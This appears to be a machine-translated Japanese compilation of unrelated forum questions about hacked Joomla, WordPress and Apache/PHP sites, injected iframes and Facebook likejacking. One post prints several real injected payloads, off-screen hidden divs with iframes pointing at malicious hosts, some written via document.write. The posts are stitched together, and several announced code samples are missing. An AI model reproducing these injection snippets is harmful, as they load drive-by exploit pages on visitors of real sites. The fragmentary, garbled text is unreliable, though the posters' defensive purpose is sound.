問題タブ [malware]

ハッキングされた Joomla サイトを扱っています。攻撃者は、含まれている JavaScript ファイルのどこかにコードを巧みに埋め込んでいます。このサイトは、さまざまな場所からこれらのファイルを何十個もロードします。スクリプトの大部分は既に圧縮されて難読化されているため、ステップスルー デバッグはほぼ不可能です。さらに、すでに見つけたサンプルから、攻撃者の JavaScript コードも同じシステムを使用して圧縮されており、「正当な」コードと視覚的に区別できないことがわかっています。

ブラウザー側を実行するコードのどこかで、iframe が作成されて DOM にアタッチされ、より深刻なエクスプロイト コードが取り込まれることを私は知っています。しかし、どのファイルのどのコードがこれを引き起こしているのかわかりません。

このイベントをブラウザでトラップして、実行中のコードがどこからロードされたかを確認する方法はありますか?

おそらく、これは Chrome または Firefox にあるでしょう。

HTMLフォームについて言えば、HTMLの難読化は実際に機能しますか？

SOに関するいくつかの投稿では、才能のある「ハッカー」が常にフォームフィールドにアクセスする方法を見つけるため（たとえば、ラベルを入力に関連付ける）、それは本当に時間の損失であると述べています。

誰かが難読化を実装し、実際に攻撃を受けましたか？

この件についてご意見をお聞かせください。

前もって感謝します。

wordpress サイトで次のメッセージが表示されます。

データベース サーバーに接続できませんでした。データベース jimbob_je が見つかりませんでした。アプリケーションで予期しない問題が発生しました。SELECT statscurl_id FROM statscurlWHERE statscurl_ip = '';

すでにsucuri.netを使用して確認しましたが、何も見つかりませんでしたが、まだエラーが発生しています。ブラウザからページ ソースを確認したところ、終了ヘッダー タグの上に暗号化されたスクリプトが 2 つありますが、header.php には見つかりません。

2 つのスクリプトの先頭には「eval(unescape」があり、ページが読み込まれているときにステータス バーにwscripts.orgとjquery.comの 2 つのサイトが表示されます。 また、Firebugで読み込まれたスクリプトを調べると、 pop.jsとimwb_cab_script という 2 つのサイトがあります。 jsですが、暗号化されておらず、上記のサイトから取得されています。どちらもランダムに読み込まれます。

これはimwb_cab_script.jsのコードです

もう 1 つのコード スクリプトpop.jsは次のとおりです。

問題は、ブラウザ ページのソースに表示されるこれらのコードを削除する方法です。

ここで暗号化されたスクリプトを見ることができます

これらのコードを取り除く方法に関する他の解決策はありますか?

ありがとう！！！

PD: このサイトはプラグインを使用していません

iOSアプリケーションのソースコードを読んでいたところ、そのセキュリティに興味があります。アプリケーションのアクセスグループは、それが構築されたエンタイトルメントで指定できるようです。ただし、ユーザーが無意識のうちに特定のグループの一部になり、ストレージに保存されているデータを読み取ろうとするマルウェアをインストールした場合、それはセキュリティの問題ではありませんか？

上記の攻撃を阻止するのは、Apple Application Screeningプロセスだけですか？それとも、私が見逃している許可管理の概念はありますか？ありがとう！

最近、サーバー ログで無料のファイル ダウンロード Web サイトを見たことがありますが、そのサイトのソース コードの 1 つに疑わしい JavaScript コードが含まれていました。私はそれについて心配する必要がありますか？当社のコンピュータ内でスパムを実行またはインストールした可能性があるため、

コード

URL

http:\\www.fileice.net/download.php?t=regular&file=rfve

数か月前、専用サーバーのすべてのサイトのすべてのページに非表示の iFrame が表示されるようになりました。503 でサイトをメンテナンスのために停止したとき、iFrame はメンテナンスのための停止ページにまだありました。最終的に、ホストは iFrame のソースをブロックしましたが、バックドアは見つかりませんでした。挿入された iFrame は次のように見えますが、難読化するためのスタイル タグとさまざまな URL でラップされています。

iframe src="http://heusnsy.nl/32283947.html..

小規模なサイトを別のホストに移動しましたが、問題はありませんでした。

メイン サイトを同じホスト上の新しい専用サーバーに移動し、サーバーをロックダウンする努力 (ファイアウォール、アクセス制限、ソフトウェア更新、すべてのファイルの検査) にもかかわらず、iFrame が返されました。

設定ファイル、htaccess など、あらゆる場所を探しましたが、見つかりませんでした。

隠された iFrame インジェクションの脆弱性がどこにあるのか、何か考えはありますか?

編集: 詳細は次のとおりです: Apache と PHP を実行している Linux マシン。すべての最新バージョン。挿入されたコードは次のようになります。

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

更新 : 詳細情報と私たちが学んだことは次のとおりです。

ホスト: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 on x86_64 / Apache バージョン 2.2.15 - PHP 5.3.3 (cli) (ビルド: 2012 年 7 月 3 日 16:53:21)

1. サーバー自体は侵害されていません。

2. (apache/php) を含むすべてのサービスは、システムで利用可能な最新バージョンにアップグレードされます。

3. アカウント (ftp またはその他) は侵害されませんでした。

4. マルウェアは、複数の感染サイトで同時に宛先 URL (iframe src=) を変更します。(unmaskparasites.com 提供)

5. src ターゲットの変更中に、不正または隠しプロセスが実行/実行されていませんでした。

6. TCPDUMP は、ポート 80 tcp を使用せずにマルウェアのコードを取得しましたが、マルウェアを受信したユーザーからの GET リクエストには異常は見られませんでした。また、対応する apache アクセス ログにも異常は見つかりませんでした。

7. ウェブサイト ファイルまたは httpd/php バイナリは、iFrame の src url アドレスの切り替え中にまったく変更されませんでした - md5sum チェックのおかげです。

8. 変更中、既知のサービスの既知のポートで不正な接続は行われませんでした。残りはファイアウォールが処理します。

9. rkhunter と maldet は結果を出しませんでした。

10. "</script>"マルウェア iFrame は、このサーバー上のすべてのアカウントと Web サイトで、このタグを持つページの最初のタグの直後にトリガーされ、挿入されます。

11. マルウェアは、静的ページやデータベース接続のないサイトに挿入されます。<head> </script></head>(ページにタグがあれば十分です)

12. 不正な apache モジュールや php モジュール (mycript.so を除く) はインストールされていません。デフォルトの Apache モジュールのほとんどは中断され、コメント アウトされています。

13. マルウェアは常に存在しているわけではありません。それは行ったり来たりし、数時間オフになることもあり、その後数人のユーザーに表示され、再び消えます。追跡が非常に困難になります。

14. 当社のサイトで実行されている 100% の php コードとほとんどの javascript コード (phpmyadmin を除く) はカスタム コードです。そうでないのは、Jquery ライブラリだけです。

サーバーはトラフィックの多いマシンであり、ログの検索/照合は非常に遅いです。1 週間のアクセス ログが 15 GB を超える場合があります。

これが状況です...アカウントの侵害、ファイルのハッキング、不正なスクリプトの問題ではなくなりました。これはこれまでに見たことのないものであり、原因は apache/php 自体のどこかに隠されています。（少なくともこれは私たちが考えていることです）。どんな助けやアイデアも大歓迎です。

iFrame インジェクションの例を次に示します。

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

JSON-LD（http://json-ld.org）のホームページにアクセスしようとすると、明らかにマルウェアサイト（http://commitse.ru/）にリダイレクトされます。なぜこれが起こっているのか、JSON-LDホームページにアクセスするための回避策についてはわかりません。誰かがこれに光を当てることができますか？

ありがとう

警告: このリンクは NSFW (ポルノです) です。

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

これは今日広まり、FB で人気のある友人がクリックしました。私はそれがマルウェアであり、彼がプログラマーであることを知っていたので、私はそれがどのように彼をだましたかを解明するために働きに行きました.

これが私が見つけたものです。ページの最初に、次の内容があります。

そこにはあまりにも秘密主義的なものは何もありません。ページが「いいね!」されると (愚かにも​​ "edge.create"と呼ばれるイベント)、プレビューが消え、ビデオ ( display:noneとして初期化されます) が表示されます。

明らかな「いいね！」がない場合、どのようにページを気に入るでしょうか。ボタン。これがスクリプトの背後にあるトリックです。スクリプトが非推奨の FBML を使用していることがわかります。

そして、最新の iFrame API、

管理を支援しているWebサイトに問題があります。訪問者は、当サイトからJavaScript難読化の警告を受け取ります。コードを意図的に難読化したことはありません。これは、考えられる原因として悪意のある攻撃を残すだけです。ウイルス対策ソフトウェアで問題が解決するようには見えません。この問題に関する有用な情報をオンラインでたくさん見つけていません。これに対処するにはどうすればよいですか？問題の原因を見つけて脅威を取り除くのに役立つLinuxサーバーで機能するユーティリティはありますか？

このコードは、Web 上のいくつかの .js ファイルで見つかりました。

どこから来たのか説明できませんか？私の FTP ログインが漏洩したという唯一の説明はありますか? 誰かがこれに会いましたか？このため、私のウェブは攻撃的なウェブのように禁止されました。